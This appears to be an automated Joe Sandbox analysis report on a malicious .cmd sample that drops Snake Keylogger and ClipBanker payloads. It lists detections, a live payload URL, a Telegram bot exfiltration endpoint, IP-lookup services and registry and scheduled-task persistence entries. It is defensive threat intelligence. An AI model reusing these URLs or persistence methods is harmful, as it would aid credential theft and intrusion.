DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	41 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO_KB#67897.cmd	25%	Virustotal		Browse
PO_KB#67897.cmd	29%	ReversingLabs	Win32.Trojan.Malcab

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\Microsofts.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Microsofts.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Oupzhkpr.PIF	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\Libraries\rpkhzpuO.pif	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Microsofts.exe	96%	ReversingLabs	ByteCode-MSIL.Spyware.Snakekeylogger
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	79%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\x.exe	18%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://lwaziacademy.com/wps/200_Oupzhkprnvw	0%	Avira URL Cloud	safe
https://lwaziacademy.com/wps/200_Oupzhkprnvwuk	0%	Avira URL Cloud	safe
https://lwaziacademy.com:443/wps/200_Oupzhkprnvw	0%	Avira URL Cloud	safe
https://lwaziacademy.com/H	0%	Avira URL Cloud	safe
http://crl.microb	0%	Avira URL Cloud	safe
https://lwaziacademy.com/wps/200	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	false	high
lwaziacademy.com	41.185.8.252	true	true	unknown
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
https://lwaziacademy.com/wps/200_Oupzhkprnvw	true	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lwaziacademy.com:443/wps/200_Oupzhkprnvw	x.exe, 00000004.00000002.2175552195.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.orgd	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.1d	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lwaziacademy.com/wps/200	x.exe, 00000004.00000002.2212967585.000000002090D000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://lwaziacademy.com/H	x.exe, 00000004.00000002.2175552195.000000000066E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.189l	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 0000000B.00000002.2304962068.0000000004331000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microb	powershell.exe, 0000000B.00000002.2417126655.0000000006E8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lwaziacademy.com/wps/200_Oupzhkprnvwuk	x.exe, 00000004.00000002.2175552195.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.org	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Microsofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2304962068.0000000004331000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.dr	false		high
http://www.pmail.com0	x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173229317.0000000021F41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173659376.000000007EC0A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241928880.0000000021FEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000002.2466353170.0000000020956000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000002.2601418278.0000000020836000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif.4.dr	false		high
https://reallyfreegeoip.org/xml/	rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
41.185.8.252	lwaziacademy.com	South Africa	36943	GridhostZA	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582352
Start date and time:	2024-12-30 11:46:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO_KB#67897.cmd
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winCMD@46/18@3/3
EGA Information:	Successful, ratio: 90%
HCA Information:	Successful, ratio: 96% Number of executed functions: 214 Number of non-executed functions: 65
Cookbook Comments:	Found application associated with file extension: .cmd

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Trading_AIBot.exe, PID 3404 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:46:53	API Interceptor	2x Sleep call for process: x.exe modified
05:47:07	API Interceptor	20x Sleep call for process: powershell.exe modified
05:47:11	API Interceptor	6x Sleep call for process: Oupzhkpr.PIF modified
05:48:04	API Interceptor	531x Sleep call for process: apihost.exe modified
11:47:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
11:47:07	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
11:47:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
11:47:20	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
41.185.8.252	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
193.122.130.0	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
checkip.dyndns.com	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
lwaziacademy.com	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	41.185.8.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Supplier.bat	Get hash	malicious	Unknown	Browse	172.67.144.225
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse	172.67.144.225
	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse	172.67.144.225
	Jx6bD8nM4qW9sL3v.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse	188.114.97.3
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	http://i646972656374o6c6373o636f6dz.oszar.com/	Get hash	malicious	Unknown	Browse	104.16.79.73
GridhostZA	armv4l.elf	Get hash	malicious	Mirai	Browse	41.61.6.129
	3.elf	Get hash	malicious	Unknown	Browse	41.185.108.101
	2.elf	Get hash	malicious	Unknown	Browse	41.61.164.248
	1.elf	Get hash	malicious	Unknown	Browse	41.185.180.246
